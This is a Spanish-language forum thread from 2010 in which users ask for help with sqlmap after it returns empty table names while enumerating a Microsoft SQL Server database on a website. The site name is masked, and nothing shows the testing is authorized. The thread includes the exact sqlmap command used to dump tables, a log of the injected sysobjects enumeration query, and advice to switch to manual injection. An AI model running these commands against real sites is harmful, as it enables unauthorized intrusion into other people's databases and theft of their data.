Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: N_q_N en 10 Diciembre 2010, 14:04 PM

Título: Ayuda con Sqlmap
Publicado por: N_q_N en 10 Diciembre 2010, 14:04 PM
Buenas, les comento mi situación. Estoy analizando un site que podría ser vulnerable a Sql injection, utilizo Sqlmap y logro ver una DB, luego quiero extraer las Tablas y me dice que tiene 14 tablas pero me aparecen todas vacías y no puedo continuar:
Ejecuto esto:

sudo ./sqlmap.py -u "http://www.SITEVULNERABLE.com/noticias_ampliar.asp?id=579" --tables -D TTBD

y me salen las 14 tablas vacías....

banner:
---
Microsoft SQL Server  2000 - 8.00.760 (Intel X86)
   Dec 17 2002 14:22:05
   Copyright (c) 1988-2003 Microsoft Corporation
   Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---

current database:    'TTBD'

Database: TTBD
[14 tables]
+--+
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
+--+
Título: Re: Ayuda con Sqlmap
Publicado por: 3st3 en 14 Diciembre 2010, 19:39 PM
Esta dificil me manda un error

[15:34:17] [INFO] retrieved: 14
[15:36:03] [INFO] performed 20 queries in 105 seconds
[15:36:03] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) AND name NOT IN (SELECT TOP 0 name FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) ORDER BY name ASC) ORDER BY name ASC
[15:36:03] [INFO] retrieved: [15:36:04] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request

Avisa si lo has solucionado
Saludos
Título: Re: Ayuda con Sqlmap
Publicado por: N_q_N en 14 Diciembre 2010, 20:26 PM
Aún no, pero voy a intentar con alguna otra herramienta de sql i.
Y aparte sólo aparece esa BD.

Gracias igual
Título: Re: Ayuda con Sqlmap
Publicado por: EvilGoblin en 15 Diciembre 2010, 17:11 PM
probaste manualmente atacar a ver q resultados tenias?
Título: Re: Ayuda con Sqlmap
Publicado por: berz3k en 18 Diciembre 2010, 07:32 AM
Las tablas y rows son enormes y tarda en compilar toda la info, os recomiendo encontrar el inject y de ahi partir de forma manual.

-berz3k.
Sólo texto | Texto con Imágenes